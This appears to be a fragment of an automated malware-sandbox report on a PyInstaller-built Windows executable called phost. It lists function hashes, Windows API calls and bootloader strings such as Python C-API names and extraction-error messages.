                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                              • Instruction ID: b85af9a162325c97392c94e8374655a037cbf82ea53900b0a518e815a76a7e82
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CA00121A0CC0AE0EA548B08ACA00352734FB50728B404032E00D994A59E2CA404A202
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75830
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75842
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75879
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7588B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758A4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758B6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758CF
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758E1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758FD
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7590F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7592B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7593D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75959
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7596B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75987
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75999
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC759B5
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC759C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                              • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                              • Instruction ID: ed7a3963f2ba6b22fca9b8c813b45cef6a5515a54ceb7c2da60ea6be0e7f8730
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9622B374B49F47D2FE159B5DAD241B423B4EF04BB9B84A035C82E86360EF3CB55AD206
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC79400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62CC745E4,00000000,00007FF62CC71985), ref: 00007FF62CC79439
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF62CC788A7,?,?,00000000,00007FF62CC73CBB), ref: 00007FF62CC7821C
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC72810: MessageBoxW.USER32 ref: 00007FF62CC728EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                              • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                              • Instruction ID: 0cadc4fbb407535a8710761200dcf4f5c4df25f7aac95ae80efcbf4f528d89d6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9351FB21B1CA4391FF50DB2DDC516BA2274EF947A4F444431D60EDA6D5EE3CE108D342
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction ID: 6c7fad6209cea5350e32bb0fc0598bf4ab7a5edddb6f78182d8730f349e6e5cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7051E736604BA186DA349F26E8181BAB7B1FB98B75F004125EFDE83A94DF3CD045DB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                              • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                              • Instruction ID: 435f4a025f35b50c762097ba75f74c85a60dbf5e56131fa384c7f5d56b7105e0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A216D31B0CA4292EF558B7EAC641796274FF88FB4F489231DB2DC77A4DE2CD5958202
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction ID: e7633c3ae476d131e9bde0ae222727082b1c6dda4ae2e176291e8e5f095c2e3b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E127361F0C14386FF267A18D955ABB76B1FB407B0F944235E69A876C8DF3CE5808B42
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction ID: 82c32ab55855f988ffdff2a29f76f49eb6b8ef0311011d8bdfedf900cb599c49
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24125461F0C18385FF269A19AC54A7B66F1EB807B4F984235D699C7BC4DF7CE4808B12
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 8ac83016c6d19718629361c98ce183280e134061d2f39cae6ebd349d7a60620e
                                                                                                                                                                                                                              • Instruction ID: 24ecff781c8b8fb6321770a5589483fa08ee505a70bf0e1b8ec60905d5b90bfd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ac83016c6d19718629361c98ce183280e134061d2f39cae6ebd349d7a60620e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE419131B1865292EE11DB19AC14ABA63B8FF44BE4F544531ED0CCB799DE3CE109D742
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 32ddf84ba07bcb3af5be6c29ad821ee78a82dc1a13238bf059d4699f4c578f7a
                                                                                                                                                                                                                              • Instruction ID: d1bf3a5b8814cd65c2a3c458666f3e6fd8a579b5481355c22a6bd59ee45c8523
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32ddf84ba07bcb3af5be6c29ad821ee78a82dc1a13238bf059d4699f4c578f7a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B141BD32B0868295EF11DB299C105BA63B4FF447E8F448532ED0D8BB99DE3CE50AD702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                              • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                              • Instruction ID: 6b5883874fdbf95cbc6a56bf27c384b4b9a377c3baf5e8e752f0591ed8bea363
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86D16173A087818AEF209B6998403AD37B8FB557A8F100139EE4D9FB95DF38E455D702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62CC73706,?,00007FF62CC73804), ref: 00007FF62CC72C9E
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62CC73706,?,00007FF62CC73804), ref: 00007FF62CC72D63
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF62CC72D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                              • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                              • Instruction ID: 5cb3398ad9f424aa146925faefde9dfb6ede7b64bcaed7543a1209bf31bb40aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A31D832B08A4152EA20AB29AC146BB66B5FF84BE8F414136EF4DD7759DF3CD50AD301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DDBD
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DDCB
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DDF5
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DE63
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62CC7DFEA,?,?,?,00007FF62CC7DCDC,?,?,?,00007FF62CC7D8D9), ref: 00007FF62CC7DE6F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                              • Instruction ID: c999403295026f7ed86a3d74d52f8c8c4901220a9f0d82ff47d6f98e20ee00d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE31A321B1AB4291EE229B0AAC0057523F8FF58BB4F595535ED1D8B3C0EF3CE4499356
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
